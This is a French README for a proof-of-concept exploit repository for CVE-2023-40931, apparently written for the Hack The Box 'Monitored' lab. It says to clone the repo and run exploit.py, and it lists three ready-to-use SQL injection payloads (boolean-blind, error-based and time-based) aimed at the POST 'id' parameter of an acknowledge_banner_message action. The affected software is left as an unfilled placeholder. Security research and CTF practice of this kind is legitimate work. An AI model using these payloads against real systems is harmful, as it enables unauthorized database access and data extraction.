
Preuve de concept pour CVE-2023-40931, créée pour HTB MONITORED
Ce dépôt contient une preuve de concept (PoC) pour CVE-2023-40931, une vulnérabilité de sécurité identifiée dans [logiciel/système concerné]. L'objectif de ce dépôt est de démontrer la vulnérabilité à des fins éducatives et de recherche uniquement. 🛠️
Ce projet est destiné à des fins éducatives et à des tests autorisés uniquement. Toute mauvaise utilisation de ce code peut entraîner des conséquences juridiques. Les auteurs ne sont pas responsables de toute mauvaise utilisation ou de tout dommage causé par ce code. Obtenez toujours une autorisation appropriée avant de tester un système. 🔒
Pour plus d'informations, consultez l'entrée CVE officielle : CVE-2023-40931. 🔗
Clonez le dépôt :
git clone https://github.com/yourusername/CVE-2023-40931-POC.git
cd CVE-2023-40931-POC
python3 exploit.py
Le paramètre POST « id » est vulnérable. Les payloads suivants ont permis d'exploiter la vulnérabilité avec succès :
Aveugle basé sur un booléen : ce payload exploite une instruction conditionnelle pour déterminer la valeur de vérité d'une requête, ce qui permet l'extraction de données via la logique booléenne.
action=acknowledge_banner_message&id=(SELECT (CASE WHEN (2064=2064) THEN 3 ELSE (SELECT 4367 UNION SELECT 3803) END))Basé sur les erreurs : ce payload exploite les messages d'erreur de la base de données pour extraire des informations en déclenchant des erreurs spécifiques.
action=acknowledge_banner_message&id=3 OR (SELECT 9867 FROM(SELECT COUNT(*),CONCAT(0x71787a7671,(SELECT (ELT(9867=9867,1))),0x716a786271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)Aveugle basé sur le temps : ce payload utilise des délais temporels pour déduire des informations en observant le temps de réponse du serveur.
action=acknowledge_banner_message&id=3 AND (SELECT 9475 FROM (SELECT(SLEEP(5)))Robc)Ces payloads démontrent la susceptibilité de la vulnérabilité aux attaques par injection SQL. Procédez avec prudence et assurez-vous d'avoir une autorisation appropriée avant de tester. 🔒
Suivez les instructions du fichier exploit.py pour exécuter le PoC. 🧑💻
Remarque : assurez-vous d'avoir installé les dépendances requises. ✅